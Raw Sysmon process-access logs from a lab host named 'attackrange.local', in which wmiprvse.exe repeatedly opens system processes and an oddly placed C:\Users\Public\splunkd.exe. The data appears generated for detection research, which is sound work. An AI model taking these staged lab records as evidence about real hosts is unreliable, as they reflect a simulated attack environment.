21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151174Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151173Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151172Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151171Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151170Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151169Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151168Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151167Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151166Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151165Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151164Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151163Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151162Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151161Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151160Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151159Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program 